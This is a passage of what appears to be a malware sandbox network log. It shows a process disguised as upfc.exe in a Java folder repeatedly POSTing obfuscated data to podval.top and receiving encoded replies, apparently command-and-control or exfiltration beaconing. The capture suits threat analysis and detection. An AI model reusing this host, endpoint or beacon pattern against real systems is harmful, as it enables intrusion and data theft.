                                                    Jul 3, 2024 16:43:19.651679993 CEST1060OUTData Raw: 5f 57 5f 54 5b 57 57 59 58 56 55 51 50 50 59 52 55 5d 5e 5c 51 5f 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _W_T[WWYXVUQPPYRU]^\Q_S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2;'9 $V'Z=17[%\,>.0!Z0#'S->;Z414Z/,"['$Y
                                                    Jul 3, 2024 16:43:19.751260042 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:20.081841946 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FQNa9dHtxEw5UZYOeX7BKss1iIlx%2B95JRZvkGMJIopLHylYDxgPNcUvGgR3xLWQPdz2BbTawIfkfBZ4lCSwv58p%2FZhv8DlDvZ7O%2BMQnpNluWvH3kQM9VoEbVInsH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5b02a3d41ec-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    91192.168.2.1049809188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:20.220547915 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:20.573498011 CEST1060OUTData Raw: 5f 54 5f 5a 5b 56 57 5f 58 56 55 51 50 5d 59 54 55 59 5e 58 51 59 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_Z[VW_XVUQP]YTUY^XQYSZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X&_<D':<3V+(=&#[&.$)\' +U,X'_# Z,<"['$Y 5
                                                    Jul 3, 2024 16:43:20.693593979 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:21.076052904 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7yWo1hTUxh4PDdTR9FKbWl3w7yOx2L35tCj7jfihgayemQVa1DyOYlql2vWh1xpdkhc6GfJOkEHf%2FVZmTiD1ZCJRtlQyqZAWmtAamCUNE2IgXv0MGMhNo2jz3du%2F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5b609ab8c21-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    92192.168.2.1049810188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:21.228593111 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:21.573498964 CEST1060OUTData Raw: 5a 51 5a 58 5b 5f 52 5c 58 56 55 51 50 5b 59 57 55 5e 5e 54 51 5e 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQZX[_R\XVUQP[YWU^^TQ^S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'*83?' 7)#=!Z.-6'C:3/T;+Z"!(^/"['$Y -
                                                    Jul 3, 2024 16:43:21.702276945 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:22.047570944 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5cgaILiKP2xo6XjNeNlV3BkaHhg5DowG4J%2F4wdSKftXn7%2BiSoIrnA30D079WNnibwL2s0PLIF%2BrVko6VN2Mf3ESax%2BHutf4ChwDP50uaGhzCWypzlZmy42TPzug%2B"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5bc5e5e4397-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    93192.168.2.1049811188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:22.177994967 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:22.526947021 CEST1060OUTData Raw: 5f 50 5f 55 5e 5c 57 5f 58 56 55 51 50 50 59 56 55 50 5e 55 51 59 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_U^\W_XVUQPPYVUP^UQYS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2:,@$^'7[)X9#.%->'&3 /."2+,"['$Y


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    94192.168.2.1049812188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:22.534507990 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1756
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:22.891227007 CEST1756OUTData Raw: 5f 54 5f 5a 5b 58 57 5f 58 56 55 51 50 59 59 56 55 5e 5e 54 51 5a 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_Z[XW_XVUQPYYVU^^TQZS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"1':+\$V#[>7==..X$%!\%3;='7";"['$Y 1
                                                    Jul 3, 2024 16:43:22.996913910 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:23.338403940 CEST735INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNEGdCYrgSl%2Fc%2BE3YHRD3t3r%2BhvtDyfepN1s52vEb%2FY2nEkSAbCHu58Th3ouYH4dWmkPEPaWqOjHzu08sCXGYbaJdDIYsc%2FEBhC6ChDdlh4ZFP%2BETpW9zsNNpP18"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5c47bd67285-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5c 31 04 0c 05 25 32 2b 52 39 3d 24 0f 29 2e 3c 5c 2c 39 35 5f 28 1a 07 5d 2d 00 0b 0a 20 2a 0c 5b 28 02 20 58 26 23 3b 0f 35 1b 20 5b 04 1c 23 1f 3c 29 35 5e 3f 3b 24 0b 32 02 36 18 30 0e 3d 5d 24 38 3d 0d 27 3b 24 05 3f 5e 39 51 24 0b 23 13 29 06 29 07 2a 37 04 13 20 24 21 54 02 13 21 09 27 5b 3a 0c 21 20 3c 0f 32 0e 13 16 33 27 2f 19 30 30 32 55 2a 33 0c 52 30 31 30 5c 21 11 0d 55 26 3b 39 04 26 2e 3d 5b 23 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%\1%2+R9=$).<\,95_(]- *[( X&#;5 [#<)5^?;$260=]$8=';$?^9Q$#))*7 $!T!'[:! <23'/002U*3R010\!U&;9&.=[#8#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    95192.168.2.1049813188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:22.655508995 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:23.027967930 CEST1060OUTData Raw: 5a 57 5f 58 5b 58 57 5d 58 56 55 51 50 5f 59 50 55 59 5e 59 51 5d 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZW_X[XW]XVUQP_YPUY^YQ]S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%9<C'_;37=&#5],>9]&550#$,( 0Z8,"['$Y =
                                                    Jul 3, 2024 16:43:23.116039038 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:23.479872942 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6xLZ36AIf0CEPShtB%2BZ9ZU4wZcZ9RIqLotvqzxwGQFnhrSWWqZjButwVjF0mU9X7lXskrcBxWfNGh3QXwTEuFvpV6CjVZsYJoGWOXYsdU2dCYfO%2FMkQkR8PtbDId"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5c539337d06-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    96192.168.2.1049814188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:23.607089043 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:23.964037895 CEST1060OUTData Raw: 5f 54 5f 5f 5b 5f 57 5c 58 56 55 51 50 5e 59 5a 55 5f 5e 5a 51 5f 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T__[_W\XVUQP^YZU_^ZQ_S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&_8E&)'Y0+]>& )Y-93%.'4,>, "4;<"['$Y
                                                    Jul 3, 2024 16:43:24.072427988 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:24.278676987 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toaOkGB581Z69vz5TD3L4gUoxPbJJQBxOw42%2BSGoozKFyjHaKLmqcsyGX22%2BGL4zbF63OIYK%2BeKDXgWDm80FXSNtbFXiJZWNY6BLrzy71hZoxrbDo0gcGPf7MmwR"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5cb296f7d0b-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    97192.168.2.1049815188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:24.408545971 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:24.761101007 CEST1060OUTData Raw: 5f 55 5a 5c 5e 5b 52 5a 58 56 55 51 50 5d 59 5a 55 5d 5e 5b 51 5d 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _UZ\^[RZXVUQP]YZU]^[Q]S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&+');Y% (.T 5\9!]$%'#8>;_48/"['$Y 5
                                                    Jul 3, 2024 16:43:24.854747057 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:25.106900930 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yr2Md1z827y8%2Fk74Bcs40JnJxbhufjvOyzpVSjMSd1O2ZkZNeO5EgeRwZRPKta%2FJ5yVgdajUYDU3HSu4uFZ2e%2BHHdnFS09%2FItQtuh1sgPTT%2FVQns66fDaS7pwjlJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5d01d530cac-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    98192.168.2.1049816188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:25.407663107 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:25.760763884 CEST1060OUTData Raw: 5f 56 5f 55 5b 57 52 5a 58 56 55 51 50 5c 59 5b 55 5d 5e 5a 51 5f 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_U[WRZXVUQP\Y[U]^ZQ_S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%)039?3']>>759..3'R/X?["!$Z/,"['$Y 1
                                                    Jul 3, 2024 16:43:26.247201920 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:26.248425007 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:26.320358992 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipXHnOiFpITk479CijatE6D5F5Va5Q4SgagqflODN%2BGcE2W8Xyg%2FwX2V5yR6RlColvbHPjYoNYe7zezqOwu1Z5E3HxGRmJrbnrncf93s0wjj93CxxdaQ2bOpb8Sd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5d70b198c27-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    99192.168.2.1049817188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:26.452852964 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:26.807116985 CEST1056OUTData Raw: 5f 50 5f 5c 5b 58 57 5b 58 56 55 51 50 59 59 5b 55 59 5e 5e 51 58 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_\[XW[XVUQPYY[UY^^QXS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]%#'),$(-)V >%-"'C=]'3?->< ;,,"['$Y
                                                    Jul 3, 2024 16:43:26.912893057 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:27.123236895 CEST574INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Blfmp0KnClBVNHvGXM8qRZpy3wbadB52Yj9oIOkso6T9mgsUpbBIedwohGO4ro31zDKlQFzhcrCLT6j74Kh32BgWq34Mh3AjnsqZ664VwRc14FUEsVmP3Qa426RX"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5dcedc619ae-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    100192.168.2.1049818188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:27.246829033 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:27.603986979 CEST1060OUTData Raw: 5f 56 5f 59 5b 5c 52 5f 58 56 55 51 50 58 59 5b 55 5f 5e 58 51 5d 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_Y[\R_XVUQPXY[U_^XQ]SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!1#'#$04>9W7%X.>%\'Y$3$/-<4X;"['$Y !
                                                    Jul 3, 2024 16:43:27.723054886 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:28.065099955 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHjbiMiU2Trpr7w9gGBTI%2BirtkaIEgXbuMd08lrpcvx9WY47OLq%2F3RNuPeDry9lGDt8rVDGdEY3PY%2FC2pYMRGgs%2BjH48usK5%2BGPRtlcPd5Tg5Y5FSta3K%2BNNtYGo"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5e1fd7342e9-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    101192.168.2.1049819188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:28.193630934 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    102192.168.2.1049820188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:28.362648010 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
